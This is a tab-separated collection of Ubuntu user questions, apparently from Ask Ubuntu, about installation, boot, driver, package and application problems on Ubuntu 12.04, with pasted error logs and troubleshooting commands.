170017	openoffice installation and the results ?	my question for this time , involves open office application . i have the sources of how to install openoffice on ubuntu os . the apache home site or the main home of the program provider and parent owner . it seems like there are a lot of steps involved in order to install open office 3.4 . i have done the necessary steps . ohhh yeah i did remove libreoffice . i promise . it 's all gone . here is what i did 1-went to parent site.http : //www.openoffice.org/download/ 2-i downloaded the necessary/proper file 3-i transferred it to the main directory home folder . 4.i extracted the file with the terminal , with the tar -xzvf file extension . 5.i got a new file called `` en-us '' . located in the home directory . 6.what do i do know . i opened the file folder . the en usa . i see three files . i have opened the deb folder . i see a whole lot of folders , but i am unsure what to do here from this point on . i am trying to get all the software working as one . let it be the writer , powerpoint and the rest of the programs from the openoffice suite . if someone out there knows what i should do now . please suggest notes or detailed .
170018	ubuntu 12.04 and virtualbox	i 've installed virtualbox on ubuntu 12.04 64 bit , but when i try installing windows7 64bit i got this error message : failed to open a session for the virtual machine microsoft . vt-x features locked or unavailable in msr . ( verr_vmx_msr_locked_or_disabled ) . result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { 1968b7d3-e3bf-4ceb-99e0-cb7c913317bb } thanks for your help
170024	how to sort by track ratings in rhythmbox ?	in banshee , we could sort the songs by star-rating by clicking on the interface itself . this way , i could transfer my starred songs easily onto the ipod and other disks . in rb , how do i show rating on the interface , and then sort them thus ?
170027	unable to boot from cd	i have just downloaded the ubuntu file from the website and burned onto a cd . restarted my computer and got the computer to load from the cd drive but it sits on black screen for about 2 mins then says unable to boot , press any key to retry . apologies but i do n't know if ou need any more info from me but if you do , please ask ! thanks paul
170035	show usb drives in launcher , but not mounted internal partitions	well the title pretty much says it all . i have partitions that appear in the launcher when the system mounts them , just like when a usb key is plugged in . i do not want these mounted internal hard disc partitions to show as icons in the launcher , but i do want my external usb to show there when i plug it in . i 've tried myunity - it has only an option to not show/hide all mounted devices , which is not what i want . can this be done ? from /proc/mounts ( in order seen in screenshot ) : /dev/sdb1 /media/cedd-de31 vfat rw , nosuid , nodev , relatime , uid=1000 , gid=1000 , fmask=0022 , dmask=0077 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , showexec , utf8 , flush , errors=remount-ro 0 0 /dev/sda3 /media/a423-e0e8 vfat rw , nosuid , nodev , relatime , uid=1000 , gid=1000 , fmask=0022 , dmask=0077 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , showexec , utf8 , flush , errors=remount-ro 0 0 /dev/sda5 /media/586c25656c253ede fuseblk rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , default_permissions , allow_other , blksize=4096 0 0 /dev/sda6 /home/greg/80gb ext4 rw , relatime , user_xattr , barrier=1 , data=ordered 0 0 other items from /proc/mounts not appearing in unity launcher : /dev/sda1 /boot/efi vfat rw , relatime , fmask=0022 , dmask=0022 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro 0 0 /dev/sda9 /mnt/backup ext4 rw , relatime , user_xattr , barrier=1 , data=ordered 0 0
170037	issue with dependencies when trying to install wine and synaptic	i am running 12.04 ubuntu on a dual-boot with win 7 and i have been trying to install wine however i had a bunch of dependency issues . so i then tried using synaptic which will not install either because of similar dependency issues like libc6 . i then searched for them in the software center some were already installed others had not because of other dependencies on top of other dependencies . i am trying to understand why i am getting these errors ? how can i just download the program without all of these loops ?
170038	fn-keys stopped working on a lenovo thinkpad edge	i 'm running 12.04 on a lenovo thinkpad edge . i 'm having these possibly related issues with things that worked perfectly when i installed ubuntu : most of the fn-keys worked seamlessly after i freshly installed ubuntu , most importantly fn+f1/f2/f3 for mute/volume control and fn+f7/f8 for brightness . recently they stopped working all together and the fn-button does nothing at all . when i close the lid on the laptop the computer does n't go to suspend mode like it used to ( and still is set to do ) , it just goes on running and does n't register when i close the lid . i noticed these two things within the same day . i have n't changed any settings that relates to these things but i 've recently installed recommend updates .
170039	apt-get broken after libboost error	i seem to accedently have destroyed the libboost package somehow and now i am unable to use apt-get anymore . i am at a loss of what to do here . when i try to install something with apt-get i get the error : dpkg : warning : files list file for package `libboost-serialization1.42-dev ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `libboost-regex1.42-dev ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `libboost-iostreams-dev ' missing , assuming package has no files currently installed . ( reading database ... 55 % dpkg : unrecoverable fatal error , aborting : files list file for package `linux-image-2.6.35-22-generic ' contains empty filename e : sub-process /usr/bin/dpkg returned an error code ( 2 ) ( and some more packages from libboost-all-dev that is missing ) . if i do sudo apt-get install libboost-all-dev i get the result reading package lists ... done building dependency tree reading state information ... done libboost-all-dev is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . is there any way i can rebuild and fix the missing packages ?
170040	will wubi ubuntu installer conflict with my current grub menu ?	i have a desktop where i dual-boot windows xp and lubuntu . given that wubi makes use of windows boot menu , if i install ubuntu 12.04 from wubi installer on windows , will it be present on grub menu ? will there be any conflict between wubi and grub menu ?
170044	btrfs and missing free space	i converted my ext4 partition to btrfs and deleted the save subvolume after doing so . then i enabled the compression ( lzo ) of the filessystem in the fstab file and everything is correct so far . then i forced the compression of all files using the defragmentation command with the parameter -c that the new compression is applied to all files . while doing so , i noticed that my ssd got completly filled up - before i had 6gigs of free space . no i got nothing left . easteregg @ x201s : ~ $ btrfs fi df / data : total=50.00gb , used=49.17gb system : total=32.00mb , used=4.00kb metadata : total=24.50gb , used=9.86gb and easteregg @ x201s : ~ $ df -ha filesystem size used avail use % mounted on /dev/sda1 75g 60g 852m 99 % / so now . how can i regain my free space . i expected to gain more space because of the lzo compression . and now ! the fs is correctly mounted . easteregg @ x201s : ~ $ mount /dev/sda1 on / type btrfs ( rw , noatime , ssd , compress=lzo ) any ideas how to fix this issue ?
170054	grub not installed	i installed ubuntu 12.04 desktop ( 32 bit , i386 ) on the second hard disk of a pc using a cd-rom . the first drive contains windows xp . it 's rather old hardware but the installation apparently worked fine . after reboot there is no daul boot screen and i am unable to start the new ubuntu installation . what went wrong and what can i do to fix it ?
170060	my computer freezes during installation	i have used a 64bit amd processor with ubuntu for the last 2 years and have installed 10.04 and then 11.10 . i have tried to upgrade to 12.04 but after the installation starts it keeps asking who i am and it wants me to fill in my name and my computer name , but then the installation freezes . i have tried the earlier version ( 9.10 ) , but the same problem persists .
170061	how to install log.io ?	how to install log.io on ubuntu 12.04 & how do i configure log.io for logs ?
170065	writing file to cd/dvd process	i am new to linux and ubuntu 12.04 lts.. i want to burn a disk . i followed the following procedure ... . insert blank dvd open the file location . right click on the file ... select the option write to disk.. after completion of write , i get one small window.. that contain following lines ... write to disc ( 100 % done ) burning image to dvd.. creating image checksum.. these process takes a long time.. so could i cancel creating image checksum ... is it affect my cd/dvd quality ? ? ? ? ? ? and any alternative procedure that take less time.. please give me suggestion ... thank you..
170066	how do i blow away thunderbird 's email/password settings ?	am running 12.04 w/latest version of thunderbird . i use thunderbird as an offline backup of gmail/goolge apps . i recently made an account change in google so that the stored credentials do n't match . i no longer am able to get thunderbird running . is there a way of modifying the email account information outside of thunderbird , or wiping what 's in there w/o completely blowing away my profile and starting from scratch ?
170067	ambiance seemingly uninstalled after update	problem : updated on 30/07/2012 ( no idea what was updated , noticed a lot of updates to qt ) , restarted , and was greeted with a broken , painful looking desktop . tried $ unity -- reset but system complained - `` window manager warning : failed to load theme `` ambiance '' : failed to find a valid file for theme ambiance
170073	problem with installing some packages and updating my ubuntu	i am somewhat new to this operating system . i have been using it since 6 months . initially there was no problem with my operating system but since the day i messed up with some wine software whenever i click on `` check '' in the update software section after a while a window is popping up and it says `` failed to download repository information '' when i click on details it is something like this : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/release unable to find expected entry 'commercial/binary-amd64/packages ' in release file ( wrong sources.list entry or malformed file ) , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/release unable to find expected entry 'commercial/binary-amd64/packages ' in release file ( wrong sources.list entry or malformed file ) , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/release unable to find expected entry 'commercial/binary-amd64/packages ' in release file ( wrong sources.list entry or malformed file ) , e : some index files failed to download . they have been ignored , or old ones used instead . i am unable to figure out the actual problem since a couple of days . i am even unable to install some software like vlc , skype , teamviewer even wine also . i am being reported the same problem always it is something like this : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.3+git20120729+r318-0~r40~precise1 ) but 2.0.3+git20120729+r318-0~r40~precise1 is to be installed depends : libavcodec-extra-53 ( > = 4:0.8-1~ ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.8-1~ ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed i became so ardent user of ubuntu that it 's impossible for me to uninstall and install it again . can someone help me out here . ?
170076	update manager failed to download repository , 401 error	i have n't used my ubuntu install in about 2 months . i went on last night and first thing i did was update , but i got this message saying it failed to download the repository and to check my connections , even though my internet is fine . here is the error log : w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/multiwinia/ubuntu/dists/precise/main/binary-amd64/packages the requested url returned error : 401 w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/multiwinia/ubuntu/dists/precise/main/binary-i386/packages the requested url returned error : 401 e : some index files failed to download . they have been ignored , or old ones used instead . i noticed that it has the name of multiwinia in the file path , which is a game i downloaded from the software store roughly 3 months ago . i removed it to see if that would fix the issue , but to no avail . any help on the issue would be much appreciated .
170077	ca n't remove raid metadata from dell r710 disks	i 've been trying hard to disable dell r710 raid mechanism to install ubuntu server 12.04 lts on the server but i could n't so far . based on this question 's answers , i should boot using a live cd ( done using ubuntu desktop 11 ) , but the mentioned commands shows unexpected responses . sudo os-prober , returns nothing sudo dmraid -re , returns no block devices found ! previously i deleted the 3 virtual disks and their controller , should i try to reconfigure them again ? !
170079	he : g15daemon : subprocess installed post-installation script returned error exit status 1	when installing various programs on synaptic and in terminal i got on 12.04 version of lubuntu 64bit , i get this error message : he : g15daemon : subprocess installed post-installation script returned error exit status 1 i had an error on an install in terminal but i ca n't trace it . can anyone tell me what is causing it . or how i can find what is causing it ?
170092	super key not opening launcher	alright so i have 12.04 installed on my macbook air and somehow it is not recognizing any key as being the super key both the option key and the command key are coming up as an alt key . i have no idea how to fix this .
170096	network card not initializing before startup programs .	i am using ubuntu 12.4 . i am using this machine to display a webpage . i have installed the mkisok plug in for fire fox and set fire fox to open on start up . the issue i am running into is it seems like the network card is n't initializing right away so there is a time out error . is there anyway to make the network card initialize first ?
170097	macbook 8.2 wifi drivers- no internet connection	i have a 17inch late 2011 macbook pro and am trying to get the wifi drivers installed but i am trying to do so without an ethernet cable connected . my only access to the internet is wireless , so i was wondering whether there is a way to manually download and install the drivers since i ca n't get them by doing the following : sudo add-apt-repository ppa : mpodroid/mactel sudo apt-get update sudo apt-get install b43-fwcutter firmware-b43-installer any help would be greatly appreciated .
170098	does landscape support user management ?	does landscape support the following user management features ? create user delete user change password for user with given username add user to group remove user from group set user login shell expire password if so , is it possible to apply the change to all the linked computers in one go ? e.g . change the password for a user on all linked servers .
170099	ati radeon hd7000 series ( laptop ) - switch mode between ati & intel integrated gpu . stuck on boot screen on intel gpu selection mode	laptop specs : hp pavilion g6-2020se gpus 1 ) ati hd7000 series 2 ) intel integrated os installed : x ) ubuntu 12.04 ( 64 bit ) i ) ati graphics card drivers installed from amd website . note : graphics card drivers are working fine in 3d mode . it runs a little hot as it should since its a gpu . observation ) amd catalyst control centre lets me choose if i want to run the system in high-end ( ati gpu ) or intel integrated ( better battery life ) while i am on high end gpu choice , ubuntu works fine . problem ) but when i switch to intel mode in the amd ccc and reboot the machine . ubuntu goes into 'low graphics mode ' . the problem is not that it goes into low graphics mode , it is completely expected since i am no longer using the ati gpu but the integrated intel gpu . problem starts with the 'selection ' of the options . during that screen , i have no mouse on the screen ( even tried plugging in an external usb mouse ) & no keyboard functionality . thus i am left completely disabled to choose any option and load into ubuntu . the only thing i can do is switch to a terminal and enable ati gpu through command-line and ubuntu works fine again . is it a bug that there is no mouse/keyboard available to me during the startup of ubuntu when its launched in low-graphics mode ? any suggestions on how to pass through that ? my palms are sweating as i write this down because the ati gpu is really heating up my laptop . i dont want to boot into windows or keep it around any longer than necessary . please advise with help and directions . sincerely , monkeyd edit1 : the answer by celso has helped me switch to intel , thus giving me sufficient battery power . kudos to celso . now i can at least use my laptop for the time being without having it burn hair off my skin . i am still looking for answer to my original question of , 'why is lightdm not working properly when i switch to intel gpu using ati hd7000 series official drivers provided by amd ' .
170102	using 12.04 , can i compile packages with gcc for 10.04 ?	my development machine is running precise , but some of my target servers are still running lucid . i 'm trying to set up my dev machine so that it can compile c/c++ for both lucid and precise . i already ran aptitude install gcc-4.4 g++-4.4 on my dev machine but that unfortunately installed version 4.4.7 of the compilers where lucid is running version 4.4.3 . after some googling , i found this : http : //packages.ubuntu.com/lucid/devel/gcc-4.4 which seems to be exactly what i want . would adding this lucid package to the precise source.list even work considering that this package was not meant for precise ? if so , exactly what url should i add to the source.list file in order to get it ? note : i 'm not really looking to compile this from source if i do n't have to . i 'm not even sure if gcc/g++ 4.4.3 will even solve my problem . i also acknowledge the possibility that i 'm going about this all wrong . is there a better or simpler way to compile for older versions of linux on precise ?
170104	trouble with aliases and opencv	i have an alias defined to compile an opencv program which goes like this alias gcv='g++ -i/usr/local/include/opencv -lopencv_core -lopencv_imgproc -lopencv_highgui -lopencv_objdetect' then i go on to type gcv imageshow.cpp i get this long list of errors but when i use the same command specified in the alias with the .cpp ( source code ) file in between the include and library files ( following the suggestion here ) , everything works like a charm . g++ -i/usr/local/include/opencv imageshow.cpp -lopencv_core -lopencv_imgproc -lopencv_highgui now typing the long command , which gets even bigger as complexity increases , every time is getting difficult , please help me in getting the alias to work or suggest any other alternative .
170105	wubi `` could not retrieve the required disk image ''	i tried to download ubuntu 12.04 through windows installer ( wubi ) , but i get this error message : an error occurred : could not retrieve the required disk image for more information , please see the log file : c : \user ( username ) \adddata\local\temp\wubi-12.04-rev266.log i tried to locate the file , but i ca n't find it , it 's probably hidden . i know there 's already a similar question asked , but i do n't understand proxy thing downloading error `` could not retrieve the required disk image `` i was wondering will i get this same problem if i download via usb stick or cd ? i 'm running windows 7 on a laptop . i 'm not tech-savvy , so i need clear answer please .
170113	where can i find an updated asus-wmi-dkms package for asus n56v ?	i 'm trying to use the answer for 166261 question . the suggested package ( install asus-wmi-dkms_0.2_all.deb.gz package ( from http : //ubuntuforums.org/showpost.php ? p=12057336 & postcount=49 ) ) seems not working for me . there is any new package / ppa for asus-wmi-dkms ? description of my framework : =========================================================== machine : asus n56v laptop =========================================================== software kubuntu 12.04 amd64 kernel linux-image-generic-lts-quantal ( 3.5.0.9-generic ) and drivers from ubuntu-x-swat ppa =========================================================== hardware and problems after installation do not boot - solved using boot-repair every couple of hours the system freezes - solved using 3.5 kernel keybord fn keys - partially working ( using asus-wmi -v 999.01 ) keyboard backlight - not working nvidia geforce gt - not used glxgears says 60 fps ethernet atheros card - solved install alx driver external subwoofer - solved adding options snd-hda-intel model=asus-mode4 ========================================================== solutions see the asnwers to the 162047 and 166261 questions ==========================================================
170114	is there anyway to contact whoever handles commercial apps for the software center ?	i have some problems with the way my app is published due to a name change . also , i want to inquire as to if/how my application can be made available for oneric ocelot , and when they come out future versions of ubuntu . i also wanted to know if there way a way to provide license keys to users who purchased before i added them . the keys are not used for drm , but to allow users to download versions of my software for other linux distributions , so it 's kind of important that i provide them . is there anywhere i can ask this sort of thing ? i sent a question asking if it 's possible to release my application on oneric ocelot via the application feedback tab , however , it has n't been answered in two updates . edit : still no luck ... is there anyone who can provide some assistance ?
170115	mouse not working and many ui errors after 12.04 upgrade	upgraded from 10.x or 11.x and i 'm having lots of problems . all icons in the dock are gone , as well as most other icons : no icons , applications ca n't be focused , no window chrome ( title bar etc ) : additionally , the mouse pointer is n't moving . it works fine under win xp . is there a way to repair ubuntu ? and keep all application settings etc ?
170121	ubuntu partition not using raid	a while ago ( about 6 months ) i set up what i thought was hardware raid 1 in my bios ( using the intel rapid storage feature ) . in windows the intel storage manager recognised the raid volume and synced everything across . i have now discovered that my ubuntu partition was not syncing between the two disks . how can i set it to respect what i now know is fake raid , and use the disk that it has been using most recently ( sda ) to synchronise ? the only entry under /dev/mapper/ is control . when using the live cd the raided partitions appear in /dev/mapper . update : i am now working with raid disabled until this is fixed .
170127	how do i create a new text file with a new name from a phpscript everytime it is executed	i use a php script which is actually for sending sms from the terminal using an online sms service 160by2 what it does is opens the terminal , asks for the number then the sms and it is sent ... now i want the text in that sms to be copied to a new file everytime . for example like text1.txt then text2.txt and it goes on incrementing every time . if its not possible from php script then may be i can rite a shell script that first executes the php script and then makes the new file with some command and copies the text in the sms into that file . i want to know that command ( i guess pipelining is also used ) and also , how to make the file name different everytime ? i do n't know shell scripting . but in a normal programing language , like c/c++/java , the way would be a loop in which a variable is incremented everytime and then passed as a parameter to the name..is anything like this possible in shell scripting ?
170128	is grub needed after converting an earlier dual boot system to only ubuntu system ?	well as the question says , i earlier had a dual boot system with windows and ubuntu.now i have deleted windows . so do i really need grub now ? coz actually grub does not show up but neither is ubuntu directly booted like it would in an `` always only ubuntu system '' in an `` always only ubuntu system '' , the splash screen directly comes up . but what i see before ubuntu starts is a countdowsn from 5 , and a message displaying `` press esc to enter into menu '' then what is displayed is something like- '' booting from ( 0 , hd7 ) ... '' and then ubuntu starts ... so can i or do i need to remove grub so that ubuntu boots like it is an `` always only ubuntu system '' ? ? thankyou .
170146	how can i make hamster switch activity when i switch workspaces ?	hamster seems to have an option that allows it to automatically switch activity whenever the workspace is switched . however i can only configure workspace 1 , and even so it does n't work ( i 'm using unity on 12.04 ) .
170149	ubuntu one nautilus overlays making problems	as stated in the title , the icon overlays ( arrow , ... ) indicating file sync are n't shown correctly . i. e. sometimes the do n't show up at all for some synced folders , then a parent folder has a syncing overlay but all subfolders and files inside show a green arrow , as it should , because everything is synced . so all in all half of the time at least some overlays are displayed in a wrong way . anyone else encountering such problems ? kind regards , tommy
170151	ca n't open downloaded games	i downloaded several games from the available free list . free cell , pacman , frozen -bubble , etc . but now ca n't get them to open . i get the dropdown asking if i wish to remove or download but there 's nowhere to open and play , and they do n't show on my launcher bar . what might i have done wrong , or not done ?
170153	can not load nvidia driver on lenovo ideapad y570 ( nvidia gt 555m )	so i understand that my laptop does not support nvidia optimus out of the box ( http : //askubuntu.com/questions/36930/how-well-do-laptops-with-nvidia-optimus-work ) , therefore i decided to install bumblebee , but it does n't change anything , i get joe @ ubuntu : ~ $ optirun glxspheres [ 4447.830749 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 4447.830844 ] [ error ] aborting because fallback start is disabled . so , i 've tried the bumblebee `` hack '' listed on https : //github.com/bumblebee-project/bbswitch/tree/hack-lenovo . i copied every line below into the terminal , is that what i was supposed to do ? i 'm a linux noob . git clone http : //github.com/bumblebee-project/bbswitch.git -b hack-lenovo cd bbswitch mkdir /usr/src/acpi-handle-hack-0.0.1 cp makefile acpi-handle-hack.c /usr/src/acpi-handle-hack-0.0.1 cp dkms/acpi-handle-hack.conf /usr/src/acpi-handle-hack-0.0.1/dkms.conf dkms add acpi-handle-hack/0.0.1 dkms build acpi-handle-hack/0.0.1 dkms install acpi-handle-hack/0.0.1 echo acpi-handle-hack | sudo tee -a /etc/modules sudo update-initramfs -u ( had to use http : // instead of git : // , in my uni ) . how can i apply this `` acpi handle hack '' on ubuntu to solve my bios/lenovo-specific problem and make bumblebee/nvidia work ?
170154	how to install webgen 0.5 ?	i am having a problem installing webgen 0.5 in ubuntu 12.04 . in particular , i have a website written in markdown , and webgen 0.5 fails with : error while working on < /index.en.html > with webgen : :contentprocessor : :kramdown : the needed library 'kramdown ' is missing . you can install it via rubygems with 'gem install kramdown ' ! i try to install via : - > sudo gem install kramdown successfully installed kramdown-0.13.7 1 gem installed installing ri documentation for kramdown-0.13.7 ... installing rdoc documentation for kramdown-0.13.7 ... however , i still get the same error in webgen ... ( i tried installing in ruby 1.8 gem , and ruby 1.9 gem and i get the same error in both cases . )
170155	sudo shutdown vs pressing power button	i have a headless ubuntu server running 64 bit ubuntu 12.04 server edition , and i connect to the server via ssh from my windows laptop . sometimes when i would like to turn off the server and my laptop is powerd off , i then need to boot up my laptop in order to log on to the server and type sudo poweroff for it to power off properly . my question is , if i press the physical power on/off button on the server , will it have the same affect as sudo poweroff ? i mean , will this trigger a sudo poweroff command or is this an improper way to do it if my laptop is n't started ? ( and no , i 'm not describing holding the button in as long as if the server is not responding ) a similar function is implemented in windows where i can choose what the power button should do ( sleep/log off/power off ) .
170157	windows dual boot with ubuntu as native os	i want to put windows 7 on my machine but i 'm already using ubuntu 12.04- most tutorials and advice i can find only describe how to dual boot using windows as the native os , which i do not want to.. is this because there will be problems creating a dual boot from inside ubuntu ? if so , what can i do ? i am required to erase my ubuntu partition ? installing first windows and then ubuntu ?
170158	unable to change resolution with beta nvidia driver ( 302.17 )	so i 've installed want to use the latest nvidia driver ( 302.17 ) from the x-swats ppa repository which was easy enough it gives me : better performance ability to rotate my secondary display , managing the gfx natively from the displays applet . but , after installing it , i there are no resolution options available other than my native resolution so i can not change the resolution in the display app or nvidia-settings . which is annoying when wanting to play games etc in other resolutions . xrandr -q , reports no other resolutions than the native one . the driver also seems to have scaling disabled , so games for example , running at a lower resolution are n't scaled up meaning i get a small centered window on my screen . according to the documentation resolutions can be added in xorg.conf , but i cant find any specifics on how to .
170160	wireless problem ( broadcom ) please help !	hi so the problem is that i can connect to my wireless but i cant connect to the internet . thinks i try : get closer to router , format , reinstall firmware . none help cat /etc/resolv.conf # generated by networkmanager nameserver 94.143.178.17 nameserver 195.167.65.194 nm-tool networkmanager tool `state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : tg3 state : unavailable default : no hw address : 00:1d:72:28 : df : b9 capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : b43 state : disconnected default : no hw address : 00:1f:3a:56:5e:73 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points efessou geuseis : infra , 00:05:59:0b:6c:37 , freq 2437 mhz , rate 54 mb/s , strength 54 - device : ttyusb0 [ cosmote default ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : mobile broadband ( gsm ) driver : option1 state : connected default : yes capabilities : ipv4 settings : address : 31.152.209.75 prefix : 32 ( 255.255.255.255 ) gateway : 10.64.64.64 dns : 94.143.178.17 dns : 195.167.65.194 sudo iwlist scan lo interface does n't support scanning . eth0 interface does n't support scanning . irda0 interface does n't support scanning . wlan0 scan completed : cell 01 - address : 00:05:59:0b:6c:37 channel:6 frequency:2.437 ghz ( channel 6 ) quality=42/70 signal level=-68 dbm encryption key : off essid : '' efessou geuseis '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 22 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=000000333425f1b6 extra : last beacon : 784ms ago ie : unknown : 000f45464553534f552047455553454953 ie : unknown : 010582848b962c ie : unknown : 030106 ie : unknown : 2a0100 ie : unknown : 32080c1218243048606c wwan0 interface does n't support scanning . ppp0 interface does n't support scanning . cat /var/lib/networkmanager/networkmanager.state [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true cat /etc/network/interfaces auto lo iface lo inet loopback lsmod | grep b43 b43 318816 0 mac80211 272785 1 b43 cfg80211 172392 2 b43 , mac80211 ssb 50682 1 b43 route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.64.64.64 0.0.0.0 ug 0 0 0 ppp0 10.64.64.64 0.0.0.0 255.255.255.255 uh 0 0 0 ppp0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 ppp0 i runned those codes when i was online with my broadband connection . if you need any command be executed when i am connected with my wireless ( witch it has problem ) please tell me
170162	banshee wo n't connect to amazon mp3 store	banshee has stopped connecting to the amazon mp3 store . it used to work fine but now i get the following error message from banshee : unable to load page can not resolve proxy hostname ( ) this problem occurred while loading the url https : //one.ubuntu.com/music/store/amz/uk/home/ i 'm running banshee 2.4.1 and 12.04lts . my internet connection is fine ( i 'm using it to post this ) . amazon say there 's nothing wrong with their server - it seems to be me ... any ideas ?
170163	how do i set a shortcut to screenshot a selected area ?	in gnome 's screen shot program , the quick keys prtscn captures the entire screen and alt+prtscn captures the active window . is there a way to script or set up the third capture option of a selected area ? update : i do n't seem to have this key already mapped ...
170169	wubi does n't start , with a `` can not mount /dev/dm-3 '' error	i installed wubi here , but when restart the pc i got the following screen : and this `` command line '' `` initramfs '' . how do i preceed from here ? -- update by the way , looks like my hd is raid . not sure , because i really do n't know how to check , and do n't know if this changes anything for using wubi .
170171	miro does not play flash and html5 videos	i wanted to watch the olympics , so i installed miro 5.0.2 ( 49960df1 ) on ubuntu 12.04 32-bit . after downloading the olympics podcasts , i tried to watch the live streams but i was greeted with these messages despite the fact that i already had adobe flash 11.2 installed on my system : so i tried installing the one from adobe 's website , too . the same video runs without any problem in the browser , but not in miro . i get the same message every time . i 'd really appreciate any help in solving this problem so that i could watch the live streams on miro itself .
170173	deleting duplicate objects from taskbar	i am using gnome 3 ( i think ) and i accidently put several icons for `` computer '' on the taskbar . how do i get rid of them and anything else i do not want on the taskbar . \ also , how do i tell what version of gnome i am using ?
170174	unistall a specific application	i am trying to install the webframework play ! http : //www.playframework.org/documentation/2.0.2/installing the problem that i encounter is that i already have another app called 'play' so if i use : $ play maik @ maik-rv411-rv511-e3511-s3511 : ~ $ play > play : sox v14.3.2 > > play fail sox : not enough input filenames specified > > usage summary : [ gopts ] [ [ fopts ] infile ] ... [ fopts ] [ effect > [ effopt ] ] ... > > special filenames ( infile , outfile ) : > - pipe/redirect input/output ( stdin/stdout ) ; may need -t > -d , -- default-device use the default audio device ( where available ) > -n , -- null use the `null ' file handler ; e.g . with synth effect > -p , -- sox-pipe alias for `-t sox -' > > special filenames ( infile only ) : `` |program [ options ] ... '' pipe input > from external program ( where supported ) http : //server/file use > the given url as input file ( where supported ) > > global options ( gopts ) ( can be specified at any point before the first > effect ) : > -- buffer bytes set the size of all processing buffers ( default 8192 ) > -- clobber do n't prompt to overwrite output file ( default ) > -- combine concatenate concatenate all input files ( default for sox , rec ) > -- combine sequence sequence all input files ( default for play ) > -d , -- no-dither do n't dither automatically > -- effects-file filename file containing effects and options > -g , -- guard use temporary files to guard against clipping > -h , -- help display version number and usage information > -- help-effect name show usage of effect name , or name=all for all > -- help-format name show info on format name , or name=all for all > -- i , -- info behave as soxi ( 1 ) > -- input-buffer bytes override the input buffer size ( default : as -- buffer ) > -- no-clobber prompt to overwrite output file > -m , -- combine mix mix multiple input files ( instead of concatenating ) > -- combine mix-power mix to equal power ( instead of concatenating ) > -m , -- combine merge merge multiple input files ( instead of concatenating ) > -- magic use `magic ' file-type detection > -- multi-threaded enable parallel effects channels processing ( where > available ) > -- norm guard ( see -- guard ) & normalise > -- play-rate-arg arg default `rate ' argument for auto-resample with `play' > -- plot gnuplot|octave generate script to plot response of filter effect > -q , -- no-show-progress run in quiet mode ; opposite of -s > -- replay-gain track|album|off default : off ( sox , rec ) , track ( play ) > -r use default random numbers ( same on each run of sox ) > -s , -- show-progress display progress while processing audio data > -- single-threaded disable parallel effects channels processing > -- temp directory specify the directory to use for temporary files > -t , -- combine multiply multiply samples of corresponding channels from all > input files ( instead of concatenating ) > -- version display version number of sox and exit > -v [ level ] increment or set verbosity level ( default 2 ) ; levels : > 1 : failure messages > 2 : warnings > 3 : details of processing > 4-6 : increasing levels of debug messages format options ( fopts ) : input file format options need only be > supplied for files that are headerless . output files will have the > same format as the input file where possible and not overriden by any > of various means including providing output format options . > > -v| -- volume factor input file volume adjustment factor ( real number ) > -- ignore-length ignore input file length given in header ; read to eof > -t| -- type filetype file type of audio > -s/-u/-f/-u/-a/-i/-a/-g encoding type=signed-integer/unsigned-integer/floating > point/mu-law/a-law/ima-adpcm/ms-adpcm/gsm-full-rate > -e| -- encoding encoding set encoding ( encoding in above list ) > -b| -- bits bits encoded sample size in bits > -1/-2/-3/-4/-8 encoded sample size in bytes > -n| -- reverse-nibbles encoded nibble-order > -x| -- reverse-bits encoded bit-order > -- endian little|big|swap encoded byte-order ; swap means opposite to default > -l/-b/-x short options for the above > -c| -- channels channels number of channels of audio data ; e.g . 2 = stereo > -r| -- rate rate sample rate of audio > -c| -- compression factor compression factor for output format > -- add-comment text append output file comment > -- comment text specify comment text for the output file > -- comment-file filename file containing comment text for the output file > -- no-glob do n't `glob ' wildcard match the following filename > > audio file formats : 8svx aif aifc aiff aiffc 